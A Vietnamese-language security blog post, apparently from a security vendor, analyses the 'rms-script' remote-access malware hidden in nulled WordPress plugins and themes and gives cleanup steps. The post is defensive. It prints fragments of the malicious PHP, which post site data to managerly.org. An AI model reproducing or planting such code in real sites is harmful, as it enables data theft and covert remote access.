Gần đây, một số trang web WordPress được phát hiện có phần mềm độc hại truy cập từ xa đang cho phép truy cập từ xa vào một trang web bên ngoài. Vị trí của phần mềm độc hại này sau đó được tìm thấy là một số tệp PHP ngẫu nhiên trong thư mục wp-content / mu-plugins. Ngay cả khi quét trang web bằng các plugin bảo mật WordPress miễn phí phổ biến, không có bất thường nào được phát hiện. Để biết thêm về phần mềm độc hại này và tìm cách khắc phục, hãy đọc tiếp.
Phần mềm độc hại rms-script làm gì
Lúc đầu, có vẻ như trang web WordPress của bạn đang hiển thị một lỗi lạ. Lỗi này do phần mềm độc hại truy cập từ xa gây ra và có thể được truy tìm từ thư mục wp-content / mu-plugins, cụ thể là các tệp PHP đáng ngờ được đánh dấu trong hình bên dưới:
![[Khắc phục] Phần mềm độc hại truy cập từ xa rms-script trong WordPress](/article/uploadfiles/202210/2022103113314740.jpg)
Ngay cả sau khi quét phần mềm độc hại được thực hiện trên trang web, không có bất kỳ dấu hiệu nào cho thấy phần mềm độc hại truy cập từ xa. Tuy nhiên, khi kiểm tra thêm các tệp PHP, người ta thấy rằng mã đang cấp quyền truy cập đăng nhập từ xa vào một trang web bên ngoài, managerly.org.
Bạn có thể xem toàn bộ mã PHP rms-script độc hại được tìm thấy tại đây.
Tìm hiểu sâu hơn về phần mềm độc hại
Khi duyệt qua các plugin của trang web để tham khảo các tệp PHP đáng ngờ (rms-script-mu-plugin.php và rms-script-ini.php), người ta nhận thấy rằng các plugin bị bẻ khóa có thể có phần mềm độc hại này. Dấu vết của những tệp này cũng được tìm thấy trong thư mục Chủ đề Divi - trong đó có một phiên bản trống trên trang web mẫu. Khi thư mục bị xóa, các tập lệnh ngừng chạy.
Đây là một phần của mã được tìm thấy trong một plugin đã bẻ khóa yêu cầu hai tập lệnh PHP độc hại:
require_once('rms-script-ini.php');
rms_remote_manager_init(__FILE__, 'rms-script-mu-plugin.php', false, false);Đây là đoạn mã tiếp theo đoạn mã trước đó:
$GLOBALS['rms_report_to'] = 'https://managerly.org/wp-admin/admin-ajax.php';
$args=
[
'method' => 'POST',
'timeout' => 15,
'redirection' => 15,
'headers' => ['Referer'=>$connect_to, 'User-Agent'=>$_SERVER['HTTP_USER_AGENT']],
'body' => $body
];
// Send to RMS
$curl = new Wp_Http_Curl();
$result=$curl->request($connect_to, $args);
$result=(is_array($result) && isset($result['body'])) ? json_decode($result['body'], true) : null;Mã này dường như thu thập dữ liệu từ trang web trên đó và gửi dữ liệu đó đến trang web bên ngoài - về bản chất, nó là một phần mềm độc hại truy cập từ xa gửi dữ liệu của bạn đến trang web managerly.org. Điều này có thể cực kỳ nguy hại - hãy tìm hiểu thêm về vấn đề đó trong phần tiếp theo.
Phân tích sâu hơn trên managerly.org cho thấy thông tin sau:
- Tổ chức của Người đăng ký: Wuxi Yilian LLC
- Bang / Tỉnh của người đăng ký: Phúc Kiến
- Quốc gia của Người đăng ký: CN
- Máy chủ Định danh: LARS.NS.CLOUDFLARE.COM, ASHLEY.NS.CLOUDFLARE.COM
- DNSSEC: không dấu
Tìm kiếm tên của tổ chức đăng ký cũng trả lại rất nhiều lượt truy cập trên các bài đăng trên Reddit. Có vẻ như LLC này là giả mạo và cũng là một trò lừa đảo khác. Dưới đây là một số kết quả tìm kiếm:
![[Khắc phục] Phần mềm độc hại truy cập từ xa rms-script trong WordPress](/article/uploadfiles/202210/2022103113314786.png)
Tại sao phần mềm độc hại này lại nguy hiểm
Trong một cuộc tấn công phần mềm độc hại truy cập từ xa, những kẻ tấn công có thể giành quyền truy cập vào trang web của bạn và sử dụng nó cho các chiến dịch độc hại của chúng. Bạn có thể mất quyền kiểm soát trang web của mình và dữ liệu nhạy cảm có thể bị tiết lộ cho kẻ tấn công.
Ở đây, những kẻ tấn công đang cố gắng khai thác tài khoản WordPress thông qua phần mềm độc hại truy cập từ xa rms-script! Việc hack này có thể vượt qua bảo mật trang web của bạn ngay cả khi bạn thay đổi mật khẩu của mình.
Lời cảnh báo - vấn đề này có khả năng tái diễn cao vì các công cụ bảo mật miễn phí không thể phát hiện ra phần mềm độc hại này. Vì vậy, hãy đảm bảo kiểm tra trang web của bạn kỹ lưỡng để tìm bất kỳ tệp nào đáng ngờ và tăng cường bảo mật cho trang web của bạn nếu có thể.
Hãy nhớ kiểm tra mọi tệp PHP độc hại trong thư mục wp-content / mu-plugins và thư mục Divi Theme nếu bạn đã cài đặt.
![[Khắc phục] Phần mềm độc hại truy cập từ xa rms-script trong WordPress](/article/uploadfiles/202210/2022103113314858.jpg)
Cách sửa trang web WordPress của bạn
1. Sao lưu trang web của bạn trước khi làm sạch:
Bạn nên kết nối trang web ngoại tuyến để người dùng không truy cập các trang bị nhiễm khi bạn đang làm sạch nó. Đảm bảo sao lưu tất cả các tệp và cơ sở dữ liệu cốt lõi. Đảm bảo sao lưu ở định dạng tệp nén, chẳng hạn như .zip.
2. Xóa bất kỳ plugin nào bị vô hiệu hóa hoặc bị nứt khỏi trang web của bạn:
Có vẻ như rất nhiều plugin và chủ đề - đặc biệt là Chủ đề Divi - đã bị bẻ khóa hoặc vô hiệu hóa có phần mềm độc hại truy cập từ xa này. Bạn có thể tìm thấy chi tiết về phần mềm độc hại này trong các plugin và chủ đề bị bẻ khóa từ The WordPress Club trong câu trả lời Stack Overflow này. Vì vậy, hãy đảm bảo xóa mọi plugin bị vô hiệu hóa hoặc bị bẻ khóa khỏi trang web của bạn và sau đó chạy quét phần mềm độc hại! Chỉ sử dụng các plugin và chủ đề chính hãng, đồng thời tiếp tục cập nhật chúng để đảm bảo trang web của bạn không dễ bị tấn công.
3. Xóa tất cả các thư mục và tệp đáng ngờ:
Kiểm tra các tệp có thể độc hại trong trang web của bạn và xóa chúng.
Hướng dẫn có liên quan - Loại bỏ phần mềm độc hại trong WordPress
4. Chạy quét phần mềm độc hại:
Phần mềm độc hại liên tục phát triển, nhưng các máy quét phần mềm độc hại cũng vậy. Luôn luôn là một ý tưởng hay để chạy quét phần mềm độc hại trên máy chủ web của bạn để tìm phần mềm độc hại và các tệp độc hại. Bạn có thể sử dụng công cụ 'Trình quét vi-rút' trong cPanel do máy chủ lưu trữ web của bạn cung cấp hoặc yêu cầu chuyên gia dọn dẹp phần mềm độc hại bằng Astra Pro Plan. Trình quét phần mềm độc hại của chúng tôi gắn cờ các tệp PHP độc hại!
![[Khắc phục] Phần mềm độc hại truy cập từ xa rms-script trong WordPress](/article/uploadfiles/202210/2022103113314804.png)
WordPress wp-content / mu-plugin Phần mềm độc hại truy cập từ xa:Kết luận
Gần đây, một phần mềm độc hại truy cập từ xa đã được tìm thấy trong các trang web WordPress, chủ yếu là những trang sử dụng plugin nulled hoặc bị bẻ khóa. Mặc dù phần mềm độc hại này không bị nhiều trình quét phần mềm độc hại phổ biến gắn cờ nhưng chúng vẫn liên tục được cập nhật và bạn nên quét nếu bạn nghi ngờ trang web của mình có thể bị ảnh hưởng. Hơn nữa, chỉ sử dụng các plugin và chủ đề chính hãng và cập nhật chúng là một cách tuyệt vời để đảm bảo rằng trang web của bạn vẫn an toàn.
Giới thiệu về Astra
Astra là bộ bảo mật web cần thiết chống lại tin tặc, các mối đe dọa từ internet &bot cho bạn. Chúng tôi cung cấp bảo mật chủ động cho các trang web của bạn chạy các CMS phổ biến như WordPress, OpenCart, Magento, v.v. Nhóm hỗ trợ kỹ thuật của chúng tôi luôn sẵn sàng hỗ trợ 24 × 7 suốt năm để giúp bạn giải quyết tất cả các thắc mắc của bạn về các tình huống tấn công và lây nhiễm phần mềm độc hại.